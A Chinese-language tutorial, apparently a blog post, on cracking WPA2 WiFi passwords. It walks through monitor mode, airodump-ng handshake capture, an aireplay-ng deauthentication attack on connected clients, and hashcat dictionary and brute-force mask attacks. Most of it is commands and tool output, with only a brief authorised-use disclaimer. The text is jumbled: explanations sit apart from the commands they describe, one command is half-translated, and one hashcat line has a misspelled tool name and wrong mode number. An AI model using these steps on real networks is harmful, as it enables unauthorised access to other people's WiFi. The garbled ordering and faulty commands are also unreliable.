airmon-ng 启动 wlan0
请注意,本文仅供技术交流和学习使用,仅限于授权环境和个人环境,严禁用于任何未授权的恶意行为,尊重法律和隐私。
Hashcat是一款功能强大的密码恢复工具,也是少数可以与GPU配合使用的工具之一,提供多种从哈希值中查找密码的方法。它可以帮助我们恢复丢失或忘记的各种平台的密码,包括Windows、Linux和macOS。现在,让我们来看看如何使用Hashcat破解WiFi密码。
破解哈希值的最简单方法是尝试猜测密码。字典和暴力攻击是最常见的猜测密码方法。这些技术利用包含单词、短语、常用密码和其他可能用作密码的字符串的文件(例如社工库)。
首先,您需要使用以下命令将无线网卡设置为监控模式。
airodump-ng wlan0
CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10
BSSID (用*代替) PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID #Data, #/s CH MB ENC CIPHER AUTH ESSID
* -29 19 1 0 6 54e WPA2 CCMP PSK xiaomi-SDXSEDSSD
* -42 17 0 0 6 54e WPA2 CCMP PSK Potian
* -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
* -42 17 0 0 11 54e WPA2 CCMP PSK 2403-5G
BSSID STATION PWR Rate Lost Packets Probes
* * -57 0 - 1 0 1
airodump-ng --bssid *(使用自己扫描到的BSSID即可) -c 6 --write wpa-01 wlan0
您可以使用”iwconfig”命令查找无线接口名称,这里我们默认为0。
使用以下命令开始扫描附近的无线网络。这将显示范围内所有Wi-Fi路由器的数据表。为了演示目的,我将选择破解我的网络”Potian”的密码。打开另一个终端并输入来自网络的接入点MAC地址(BSSID)和通道:
aireplay-ng -0 100 -a * -c * wlan0
–write wpa-01是写入数据的文件名,也是存储4次握手的文件名。
您可以使用”ls”命令查看该文件,稍后您需要将其转换为不同的格式才能破解密码。
WPA/WPA2使用4次握手来验证网络设备的身份,您可以在此过程中获取四次握手。打开另一个终端并输入:
CH 6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: *
“WPA handshake:*”代表成功捕获
-0表示取消验证。
100是解除认证数据包的数量。
-a是接入点的MAC地址。
-c是要解除身份验证的客户端的MAC地址。
在破解密码之前,您需要将.cap文件(wpa-01.cap)转换为hashcat文件格式.hc22000。通过将.cap文件上传到并将其转换为.hc22000格式。
hashcat –m 22000 wpa-01.hc22000 password.txt
haschcat –m 2200 –a 3 wpa-01.hc22000 ?l ?l ?l ?l ?l ?l ?l ?l ?l ?l
Hashcat有两种最常见的攻击方式:
字典攻击:除了hashcat之外,您还需要一个包含常用密码列表的单词表。使用以下命令开始破解过程:
暴力攻击:基于尝试每种可能的组合,随着密码长度的增加,可能的组合数量会急剧增加。使用以下命令:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;?@[]^_`{|}~
-a 3表示您正在使用暴力攻击模式。
wpa-01.hc22000是转换后的.cap文件。
?l ?l ?l ?l ?l ?l ?l ?l ?l ?l是您的掩码,其中l表示小写字母。这意味着密码全部由小写字母组成。
Hashcat可以使用以下内置字符集: